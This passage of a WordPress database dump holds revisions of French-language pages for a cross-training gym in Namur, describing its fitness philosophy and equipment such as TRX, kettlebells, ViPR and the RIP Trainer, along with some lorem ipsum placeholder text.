Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.\r\n<h2><b>RIP TRAINER</b></h2>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 08:02:41', '2013-06-16 08:02:41', '', 22, 'http://www.crosstrainingcenter.be/?p=40', 0, 'revision', '', 0),
(33, 1, '2013-05-24 14:36:30', '2013-05-24 14:36:30', 'définition, historique', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-05-24 14:36:30', '2013-05-24 14:36:30', '', 22, 'http://www.crosstrainingcenter.be/?p=33', 0, 'revision', '', 0),
(34, 1, '2013-05-24 14:36:30', '2013-05-24 14:36:30', '<i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i>\r\n\r\n<i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i>\r\n\r\n<i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-05-24 14:36:30', '2013-05-24 14:36:30', '', 5, 'http://www.crosstrainingcenter.be/?p=34', 0, 'revision', '', 0),
(103, 1, '2013-06-16 13:57:21', '2013-06-16 13:57:21', '', 'picto2', '', 'inherit', 'open', 'open', '', 'picto2', '', '', '2013-06-16 13:57:21', '2013-06-16 13:57:21', '', 5, 'http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png', 0, 'attachment', 'image/png', 0),
(42, 1, '2013-06-13 16:26:32', '2013-06-13 16:26:32', 'Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle, en privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis. Ce dosage subtil définit la qualité de l\'entraînement. Ces 3 buts sont :\r\n<p align=\"center\"><b>PREVENIR</b> – <b>AMELIORER</b> – <b>RECUPERER</b>.</p>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p align=\"center\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-13 16:26:32', '2013-06-13 16:26:32', '', 5, 'http://www.crosstrainingcenter.be/?p=42', 0, 'revision', '', 0),
(53, 1, '2013-06-16 10:24:38', '2013-06-16 10:24:38', 'Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle, en privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis. Ce dosage subtil définit la qualité de l\'entraînement. Ces 3 buts sont :\r\n\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p align=\"center\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 10:24:38', '2013-06-16 10:24:38', '', 5, 'http://www.crosstrainingcenter.be/?p=53', 0, 'revision', '', 0),
(44, 1, '2013-06-16 08:20:16', '2013-06-16 08:20:16', 'Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle, en privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis. Ce dosage subtil définit la qualité de l\'entraînement. Ces 3 buts sont :\r\n<p align=\"center\"><b><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-41\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x127.png\" width=\"300\" height=\"127\" /></a></b></p>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p align=\"center\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 08:20:16', '2013-06-16 08:20:16', '', 5, 'http://www.crosstrainingcenter.be/?p=44', 0, 'revision', '', 0),
(46, 1, '2013-06-16 10:02:09', '2013-06-16 10:02:09', 'Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle, en privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis. Ce dosage subtil définit la qualité de l\'entraînement. Ces 3 buts sont :\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-43\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x127.png\" width=\"300\" height=\"127\" /></a>\r\n<p align=\"center\"></p>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p align=\"center\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 10:02:09', '2013-06-16 10:02:09', '', 5, 'http://www.crosstrainingcenter.be/?p=46', 0, 'revision', '', 0),
(48, 1, '2013-06-16 10:05:33', '2013-06-16 10:05:33', 'Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle, en privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis. Ce dosage subtil définit la qualité de l\'entraînement. Ces 3 buts sont :\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-45\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x127.png\" width=\"300\" height=\"127\" /></a>\r\n\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p align=\"center\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 10:05:33', '2013-06-16 10:05:33', '', 5, 'http://www.crosstrainingcenter.be/?p=48', 0, 'revision', '', 0),
(50, 1, '2013-06-16 10:09:07', '2013-06-16 10:09:07', 'Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle, en privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis. Ce dosage subtil définit la qualité de l\'entraînement. Ces 3 buts sont :\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-45\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x127.png\" width=\"300\" height=\"127\" /></a>\r\n\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p align=\"center\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 10:09:07', '2013-06-16 10:09:07', '', 5, 'http://www.crosstrainingcenter.be/?p=50', 0, 'revision', '', 0),
(51, 1, '2013-06-16 10:14:10', '2013-06-16 10:14:10', 'Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle, en privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis. Ce dosage subtil définit la qualité de l\'entraînement. Ces 3 buts sont :\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-45\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x127.png\" width=\"300\" height=\"127\" /></a>\r\n\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p align=\"center\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 10:14:10', '2013-06-16 10:14:10', '', 5, 'http://www.crosstrainingcenter.be/?p=51', 0, 'revision', '', 0),
(54, 1, '2013-06-16 08:04:06', '2013-06-16 08:04:06', '« Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines. Afin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2>TRX Suspension Training</h2>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n<h2>Kettlebel</h2>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.\r\n<h2>ViPR</h2>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.\r\n<h2>RIP Trainer</h2>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 08:04:06', '2013-06-16 08:04:06', '', 22, 'http://www.crosstrainingcenter.be/?p=54', 0, 'revision', '', 0),
(55, 1, '2013-06-16 10:42:17', '2013-06-16 10:42:17', '<blockquote>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2>TRX Suspension Training</h2>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n<h2>Kettlebel</h2>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.\r\n<h2>ViPR</h2>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.\r\n<h2>RIP Trainer</h2>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 10:42:17', '2013-06-16 10:42:17', '', 22, 'http://www.crosstrainingcenter.be/?p=55', 0, 'revision', '', 0),
(56, 1, '2013-06-16 10:43:00', '2013-06-16 10:43:00', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2>TRX Suspension Training</h2>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n<h2>Kettlebel</h2>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.\r\n<h2>ViPR</h2>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.\r\n<h2>RIP Trainer</h2>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 10:43:00', '2013-06-16 10:43:00', '', 22, 'http://www.crosstrainingcenter.be/?p=56', 0, 'revision', '', 0),
(57, 1, '2013-06-16 10:44:43', '2013-06-16 10:44:43', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2></h2>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2>TRX Suspension Training</h2>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n<h2>Kettlebel</h2>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.\r\n<h2>ViPR</h2>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de 